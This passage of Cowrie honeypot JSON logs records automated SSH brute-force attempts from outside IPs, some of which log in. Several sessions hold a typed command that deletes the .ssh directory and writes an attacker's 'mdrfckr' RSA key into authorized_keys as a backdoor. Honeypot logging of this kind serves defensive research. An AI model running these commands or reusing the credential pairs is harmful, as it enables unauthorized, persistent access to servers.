stp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:16:44.399616Z","src_ip":"212.227.235.229","session":"6d5d15457b8c"}
{"eventid":"cowrie.login.success","username":"root","password":"Online1!","message":"login attempt [root/Online1!] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:16:45.880886Z","src_ip":"212.227.235.229","session":"6d5d15457b8c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:16:46.535609Z","src_ip":"212.227.235.229","session":"6d5d15457b8c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:16:46.536336Z","src_ip":"212.227.235.229","session":"6d5d15457b8c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:16:46.537311Z","src_ip":"212.227.235.229","session":"6d5d15457b8c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:16:46.856776Z","src_ip":"212.227.235.229","session":"6d5d15457b8c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:16:48.030230Z","src_ip":"212.227.235.229","session":"6d5d15457b8c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:16:48.031121Z","src_ip":"212.227.235.229","session":"6d5d15457b8c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:16:48.349392Z","src_ip":"212.227.235.229","session":"6d5d15457b8c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:16:48.350392Z","src_ip":"212.227.235.229","session":"6d5d15457b8c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40828,"dst_ip":"1.2.3.4","dst_port":22,"session":"a21402cd32a8","protocol":"ssh","message":"New connection: 212.227.235.229:40828 (1.2.3.4:22) [session: a21402cd32a8]","sensor":"my-vps","timestamp":"2025-09-08T23:16:48.649649Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:16:48.650455Z","src_ip":"212.227.235.229","session":"a21402cd32a8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:16:48.951509Z","src_ip":"212.227.235.229","session":"a21402cd32a8"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:16:49.091264Z","src_ip":"212.227.125.160","session":"a8e7bd27160f"}
{"eventid":"cowrie.session.connect","src_ip":"45.226.5.85","src_port":47886,"dst_ip":"1.2.3.4","dst_port":23,"session":"35084edca8c1","protocol":"telnet","message":"New connection: 45.226.5.85:47886 (1.2.3.4:23) [session: 35084edca8c1]","sensor":"my-vps","timestamp":"2025-09-08T23:16:49.830951Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:16:50.608319Z","src_ip":"212.227.235.229","session":"a21402cd32a8"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:16:51.910797Z","src_ip":"212.227.235.229","session":"a21402cd32a8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40840,"dst_ip":"1.2.3.4","dst_port":22,"session":"1cc3fbcd10f3","protocol":"ssh","message":"New connection: 212.227.235.229:40840 (1.2.3.4:22) [session: 1cc3fbcd10f3]","sensor":"my-vps","timestamp":"2025-09-08T23:16:52.227787Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:16:52.228734Z","src_ip":"212.227.235.229","session":"1cc3fbcd10f3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:16:53.006595Z","src_ip":"212.227.235.229","session":"1cc3fbcd10f3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:16:54.288789Z","src_ip":"212.227.235.229","session":"1cc3fbcd10f3"}
{"eventid":"cowrie.session.closed","duration":"10.5","message":"Connection lost after 10.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:16:54.596107Z","src_ip":"212.227.235.229","session":"6d5d15457b8c"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:16:54.597372Z","src_ip":"212.227.235.229","session":"1cc3fbcd10f3"}
{"eventid":"cowrie.session.closed","duration":13.33863353729248,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:17:03.169503Z","src_ip":"45.226.5.85","session":"35084edca8c1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:17:06.271077Z","src_ip":"212.227.235.229","session":"546d5de3f231"}
{"eventid":"cowrie.session.closed","duration":180.2365312576294,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:17:06.276075Z","src_ip":"212.227.235.229","session":"546d5de3f231"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46158,"dst_ip":"1.2.3.4","dst_port":22,"session":"1098381ff88c","protocol":"ssh","message":"New connection: 212.227.235.229:46158 (1.2.3.4:22) [session: 1098381ff88c]","sensor":"my-vps","timestamp":"2025-09-08T23:17:35.114887Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:17:35.115772Z","src_ip":"212.227.235.229","session":"1098381ff88c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:17:35.210898Z","src_ip":"212.227.235.229","session":"1098381ff88c"}
{"eventid":"cowrie.login.failed","username":"john","password":"123","message":"login attempt [john/123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:17:35.635234Z","src_ip":"212.227.235.229","session":"1098381ff88c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:17:36.733999Z","src_ip":"212.227.235.229","session":"1098381ff88c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49686,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb9b6639e563","protocol":"ssh","message":"New connection: 212.227.235.229:49686 (1.2.3.4:22) [session: fb9b6639e563]","sensor":"my-vps","timestamp":"2025-09-08T23:17:41.060463Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:17:41.062588Z","src_ip":"212.227.235.229","session":"fb9b6639e563"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:17:41.200840Z","src_ip":"212.227.235.229","session":"fb9b6639e563"}
{"eventid":"cowrie.login.success","username":"root","password":"QAZ123wsx","message":"login attempt [root/QAZ123wsx] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:17:41.750044Z","src_ip":"212.227.235.229","session":"fb9b6639e563"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:17:42.082519Z","src_ip":"212.227.235.229","session":"fb9b6639e563"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:17:42.083238Z","src_ip":"212.227.235.229","session":"fb9b6639e563"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:17:42.084457Z","src_ip":"212.227.235.229","session":"fb9b6639e563"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:17:42.229976Z","src_ip":"212.227.235.229","session":"fb9b6639e563"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:17:42.520519Z","src_ip":"212.227.235.229","session":"fb9b6639e563"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:17:42.521161Z","src_ip":"212.227.235.229","session":"fb9b6639e563"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:17:42.659254Z","src_ip":"212.227.235.229","session":"fb9b6639e563"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:17:42.660140Z","src_ip":"212.227.235.229","session":"fb9b6639e563"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49690,"dst_ip":"1.2.3.4","dst_port":22,"session":"e42374e4800f","protocol":"ssh","message":"New connection: 212.227.235.229:49690 (1.2.3.4:22) [session: e42374e4800f]","sensor":"my-vps","timestamp":"2025-09-08T23:17:42.798310Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:17:42.803628Z","src_ip":"212.227.235.229","session":"e42374e4800f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:17:42.940184Z","src_ip":"212.227.235.229","session":"e42374e4800f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:17:43.492299Z","src_ip":"212.227.235.229","session":"e42374e4800f"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:17:44.629256Z","src_ip":"212.227.235.229","session":"e42374e4800f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50674,"dst_ip":"1.2.3.4","dst_port":22,"session":"abfed060d24f","protocol":"ssh","message":"New connection: 212.227.235.229:50674 (1.2.3.4:22) [session: abfed060d24f]","sensor":"my-vps","timestamp":"2025-09-08T23:17:44.762041Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:17:44.767002Z","src_ip":"212.227.235.229","session":"abfed060d24f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:17:44.898845Z","src_ip":"212.227.235.229","session":"abfed060d24f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:17:45.451344Z","src_ip":"212.227.235.229","session":"abfed060d24f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:17:45.584994Z","src_ip":"212.227.235.229","session":"abfed060d24f"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:17:45.585901Z","src_ip":"212.227.235.229","session":"fb9b6639e563"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35198,"dst_ip":"1.2.3.4","dst_port":22,"session":"adefc1d15eb9","protocol":"ssh","message":"New connection: 212.227.235.229:35198 (1.2.3.4:22) [session: adefc1d15eb9]","sensor":"my-vps","timestamp":"2025-09-08T23:17:59.978373Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:17:59.979056Z","src_ip":"212.227.235.229","session":"adefc1d15eb9"}
